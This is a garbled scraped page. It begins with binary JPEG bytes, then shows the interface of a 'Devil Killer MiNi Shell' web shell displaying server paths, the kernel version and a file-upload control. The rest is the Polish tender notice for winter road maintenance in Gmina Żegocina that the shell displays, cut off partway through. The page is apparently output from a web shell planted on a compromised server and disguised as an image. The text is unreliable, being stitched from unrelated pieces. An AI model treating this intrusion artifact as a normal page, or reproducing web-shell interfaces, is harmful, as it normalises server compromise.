JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211208/0030411701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg gminnych w Gminie Żegocina w 2022 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŻEGOCINA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660750</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">316</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żegocina</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-731</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zegocina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zegocina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg gminnych w Gminie Żegocina w 2022 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2da89e8b-579d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00304117</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004076/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Zimowe utrzymanie dróg gminnych w Gminie Żegocina w 2022 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zegocina.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy znajdującej się pod adresem: https://zegocina.ezamawiajacy.pl w zakładce „Korespondencja” lub elektronicznie na adres e-mail: przetargi@zegocina.pl Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: 1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; 2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GBRam, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux,lub ich nowsze wersje; 3. Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,najlepiej w<br/>najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0; 4. Włączona obsługa JavaScript; 5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie.pdf. 6. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100MB w txt,<br/>rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png,svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml,xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.24.PN.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Bytomsko (odśnieżanie): (Nagórze, Depcok, Piech, Krawczyk, Stawki, Podlas- Prytko-Fąfara (Pańskie), Podlas- Majdan- Surma- Dzięgiel, Młyn, Działy (Strączek, Rozum), Żarnówka, Węgry- Fąfarowa Góra- Groń, Jakubczyk, Żarnówka (Fąfara), Górecki, Żegocina: Kępiaki- Piwowarczyk (Krawczyk), Szkoła- przedszkole, Kędziory – Żarnówka, Brzeg.<br/>Przewidywana liczba kilometrów do zimowego utrzymania dróg w okresie 01.01.2022r.-30.04.2022r. wynosi: 162,60 km, w okresie 01.10.2022-31.12.2022r. wynosi: 27,10 km. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji o którym mowa w art.441 ust.1 Pzp., polegające na świadczeniu usługi przez wykonawcę na takich samych warunkach określonych w umowie, po wyczerpaniu zakresu ilości kilometrów dróg podanych w Rozdziale 5 SWZ. Opis przedmiotu zamówienia w ust. 3 SWZ, maksymalnie do wysokości 30% zamówienia podstawowego. Prawo opcji oznacza, że usługi objęte prawem opcji zostaną zakupione w zależności od potrzeb i posiadanych środków przez Zamawiającego. Prawo opcji jest uprawnieniem Zamawiającego z którego może ale nie musi skorzystać. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem uruchomiania prawa opcji jest złożenie przez Zamawiającego oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów biorąc pod uwagę nw. kryteria. Łączna ilość punktów dla każdej oferty stanowić będzie sumę punktów uzyskanych w podanych kryteriach tj.:<br/>C = Kryterium: Cena – waga 60 %<br/>T = Kryterium: Termin płatności faktur – waga 40 %<br/>Termin płatności faktury<br/>Termin płatności faktury- 40 pkt wg zadeklarowanego terminu płatności faktury<br/>7 dni - 0 pkt<br/>14 dni - 10 pkt<br/>21 dni - 20 pkt<br/>30 dni - 40 pkt<br/>Uwagi:<br/>W przypadku braku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu płatności Zamawiający uzna, że Wykonawca zaoferował termin 7 dni. Maksymalny termin płatności do oceny ofert wynosi 30 dni. Jeżeli Wykonawca zaoferuje termin płatności dłuższy niż 30 dni, do oceny ofert zostanie przyjęty okres 30 dni i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy termin płatności otrzymuje maksymalna liczbę punktów w ramach kryterium termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Łąkta Górna (odśnieżanie): Żarnówka – osiedle - Dział (Krawczyk, Perczak), Krawczyki, Przedszkole – Janickówka, Witkówka, Brzeziny, Podkosówka - Skrzydłówka (Kuce, Pitry, Orły, Florek, Rogóż, Wałach, Krawczyk), Rola, Madejówka (Krawczyk, Dudek), (Granice Rogóż), Kamionki- Madejówka, Mrozy – oczyszczalnia, Parking, Konice – Lisówki, Kępa – Kowalczyk, Lisówki – Wrony – Knap, Lisówki, Dział (Czamara, Steczko, Palej, Dudzic), Sikornice, Zagrody (Cebula – Szmyd – Bujak - Golemiec – Janas), Pod przylasek. <br/>Przewidywana liczba kilometrów do zimowego utrzymania dróg w okresie 01.01.2022r.-30.04.2022r. wynosi: 258 km, w okresie 01.10.2022-31.12.2022r. wynosi: 43,00 km. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Podany powyżej kilometraż dróg jest orientacyjny. Podanie faktycznej ilości kilometrów zimowego odśnieżania dróg w okresie umownym nie jest możliwe do określenia – związane jest to z warunkami meteorologicznymi, niezależnymi od Zamawiającego. <br/><br/>4.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji o którym mowa w art. 441 ust.1 Pzp., polegające na świadczeniu usługi przez wykonawcę na takich samych warunkach określonych w umowie, po wyczerpaniu zakresu ilości kilometrów dróg podanych w Rozdziale 5. Opis przedmiotu zamówienia w ust. 3 SWZ, maksymalnie do wysokości 30% zamówienia podstawowego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów biorąc pod uwagę nw. kryteria. Łączna ilość punktów dla każdej oferty stanowić będzie sumę punktów uzyskanych w podanych kryteriach tj.:<br/>C = Kryterium: Cena – waga 60 %<br/>T = Kryterium: Termin płatności faktur – waga 40 %<br/>Termin płatności faktury<br/>Termin płatności faktury- 40 pkt wg zadeklarowanego terminu płatności faktury<br/>7 dni - 0 pkt<br/>14 dni - 10 pkt<br/>21 dni - 20 pkt<br/>30 dni - 40 pkt<br/>Uwagi:<br/>W przypadku braku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu płatności Zamawiający uzna, że Wykonawca zaoferował termin 7 dni. Maksymalny termin płatności do oceny ofert wynosi 30 dni. Jeżeli Wykonawca zaoferuje termin płatności dłuższy niż 30 dni, do oceny ofert zostanie przyjęty okres 30 dni i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy termin płatności otrzymuje maksymalna liczbę punktów w ramach kryterium termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – Bełdno (odśnieżanie) - Wieś od drogi powiatowej- centrum wsi, Konice (Granice), Wieś – Zastawie, Wieś - Kępy – Juszczyk, Wieś – Stawiska, Wieś – Szkoła, Podlas, Siandajówka, Połom, Marzec, Żegocina - Podlas- Potoki, Nowa Wieś, Nagórze- Podlesie, Koło Cmentarza Przewidywana liczba kilometrów do zimowego utrzymania dróg w okresie 01.01.2022r.-30.04.2022r. wynosi: 149,40 km, w okresie 01.10.2022-31.12.2022r. wynosi: 24,90 km. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji o którym mowa w art.441<br/>ust.1 Pzp., polegające na świadczeniu usługi przez wykonawcę na takich samych warunkach<br/>określonych w umowie, po wyczerpaniu zakresu ilości kilometrów dróg podanych w Rozdziale 5<br/>SWZ. Opis przedmiotu zamówienia w ust. 3 SWZ, maksymalnie do wysokości 30% zamówienia<br/>podstawowego. Prawo opcji oznacza, że usługi objęte prawem opcji zostaną zakupione w<br/>zależności od potrzeb i posiadanych środków przez Zamawiającego. Prawo opcji jest<br/>uprawnieniem Zamawiającego z którego może ale nie musi skorzystać. W przypadku<br/>nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne<br/>roszczenia z tego tytułu. Warunkiem uruchomiania prawa opcji jest złożenie przez<br/>Zamawiającego oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym<br/>przez niego zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów biorąc pod uwagę nw. kryteria. Łączna ilość punktów dla każdej oferty stanowić będzie sumę punktów uzyskanych w podanych kryteriach tj.:<br/>C = Kryterium: Cena – waga 60 %<br/>T = Kryterium: Termin płatności faktur – waga 40 %<br/>Termin płatności faktury<br/>Termin płatności faktury- 40 pkt wg zadeklarowanego terminu płatności faktury<br/>7 dni - 0 pkt<br/>14 dni - 10 pkt<br/>21 dni - 20 pkt<br/>30 dni - 40 pkt<br/>Uwagi:<br/>W przypadku braku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu płatności Zamawiający uzna, że Wykonawca zaoferował termin 7 dni. Maksymalny termin płatności do oceny ofert wynosi 30 dni. Jeżeli Wykonawca zaoferuje termin płatności dłuższy niż 30 dni, do oceny ofert zostanie przyjęty okres 30 dni i taki zostanie uwzględniony także w umowie. Wykonawca, który zaoferuje najkorzystniejszy termin płatności otrzymuje maksymalna liczbę punktów w ramach kryterium termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Żegocina (odśnieżanie) - Piechówka- Przybyszówka, Wiktorówka- Górczyna (Kaleta), Patrówka, Pasternik, Kowalówka, Nadole (Dudzic, Komunalna, Targowica), Centrum-parkingi, Ośrodek Zdrowia- Górczyna, Przysłop – Ciupagówka - Rdzawki, Nagórze- Góry, Kowalczyki, Mariany, Rozdziele - Góry (Ryba), Szkoła – Błaskówka, Rola – Sroka, Pławecki I, II, Jochany, Skolnik- Ogielówka, Szkoła – Rozdziele – Kamionka – Laskowa – Wieś, Zagrabie – Góry – Dwór -Wieś Odroniec, Doliny, Widoma – (Bacówka) – Lasowina – Błaskówka, chodnik Szkoła – Schronisko, Dulany <br/>Przewidywana liczba kilometrów do zimowego utrzymania dróg w okresie 01.01.2022r.-30.04.2022r. wynosi: 349,20 km, w okresie 01.10.2022-31.12.2022r. wynosi: 58,20 km. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji o którym mowa w art.441<br/>ust.1 Pzp., polegające na świadczeniu usługi przez wykonawcę na takich samych warunkach<br/>określonych w umowie, po wyczerpaniu zakresu ilości kilometrów dróg podanych w Rozdziale 5<br/>SWZ. Opis przedmiotu zamówienia w ust. 3 SWZ, maksymalnie do wysokości 30% zamówienia<br/>podstawowego. Prawo opcji oznacza, że usługi objęte prawem opcji zostaną zakupione w<br/>zależności od potrzeb i posiadanych środków przez Zamawiającego. Prawo opcji jest<br/>uprawnieniem Zamawiającego z którego może ale nie musi skorzystać. W przypadku<br/>nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne<br/>roszczenia z tego tytułu. Warunkiem uruchomiania prawa opcji jest złożenie przez<br/>Zamawiającego 